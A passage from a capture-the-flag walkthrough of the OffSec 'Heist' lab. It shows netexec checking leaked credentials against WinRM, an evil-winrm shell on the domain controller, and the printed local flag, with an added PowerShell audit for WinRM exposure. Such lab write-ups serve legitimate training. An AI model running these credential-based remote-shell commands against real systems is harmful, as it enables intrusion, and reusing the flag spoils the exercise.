In addition to the web app on 8080, an HTTP(S) request to http://192.168.247.165:5985/wsman returns a 200 response code, confirming that WinRM is accessible internally, but we'll need credentials to do anything with it.
Port 47001 is the same service, but it is only open on the target's localhost: https://morgansimonsen.com/2009/12/10/winrm-and-tcp-ports/
With the enox:california credentials:

```
netexec winrm DC01.heist.offsec -u enox -p california
WINRM 192.168.109.165 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:heist.offsec)
WINRM 192.168.109.165 5985 DC01 [+] heist.offsec\enox:california (Pwn3d!)
```

Pwn3d! indicates we have remote access via WinRM. We'll continue using evil-winrm:
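As an added check (not part of this writeup), the following PowerShell audit, run elevated on a Windows host like DC01, shows the same exposure from the inside: which addresses the WinRM listeners bind to (5985/5986 versus the loopback-only 47001 noted above), whether unencrypted transport or Basic auth is enabled, and which principals are allowed to open a remote shell. Only standard cmdlets and WSMan: drive paths are used; no box-specific values are assumed.

```powershell
# Added WinRM exposure audit (not from the original writeup). Run in an
# elevated PowerShell session on the host being reviewed.
$winrmPorts = 5985, 5986, 47001   # standard WS-Man HTTP, HTTPS and service ports

Write-Host "== WinRM service state =="
Get-Service WinRM | Select-Object Status, StartType

Write-Host "`n== Sockets listening on WinRM ports (0.0.0.0 / :: = every interface) =="
Get-NetTCPConnection -State Listen |
    Where-Object { $winrmPorts -contains $_.LocalPort } |
    Select-Object LocalAddress, LocalPort, OwningProcess

Write-Host "`n== Configured WS-Man listeners =="
Get-WSManInstance -ResourceURI winrm/config/listener -Enumerate |
    Select-Object Transport, Address, Port, ListeningOn

Write-Host "`n== Service settings that weaken transport or credential security =="
[pscustomobject]@{
    AllowUnencrypted = (Get-Item WSMan:\localhost\Service\AllowUnencrypted).Value
    BasicAuth        = (Get-Item WSMan:\localhost\Service\Auth\Basic).Value
}

Write-Host "`n== Who may open a remote shell (Permission column) =="
Get-PSSessionConfiguration | Select-Object Name, Permission
```

A listener with Address * or a socket bound to 0.0.0.0 means any host that obtains a valid password, as happened here, can get a shell; restricting the listener address, the session-configuration permissions, or the firewall scope closes that path.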
Exploitation with evil-winrm
```
evil-winrm -i DC01.heist.offsec -u enox -p california
```
Just like that, we have a shell! I'm actually going to exit, make a directory named scripts, and copy SauronEye into it, to easily transfer it to the host.
This utility lets us find .txt files very quickly, including the local flag:
```
type C:\Users\enox\Desktop\local.txt
9de76564847d8624b14b7595604ba7fd
```

C:\Users\enox\Desktop\todo.txt also looks interesting:
- Setup Flask Application for Secure Browser [DONE]
- Use group managed service account for apache [DONE]
- Migrate to apache
- Debug Flask Application [DONE]
- Remove Flask Application
- Submit IT Expenses file to admin. [DONE]
Next I’ll begin enumeration for privilege escalation in [[Enox → svc_apache]].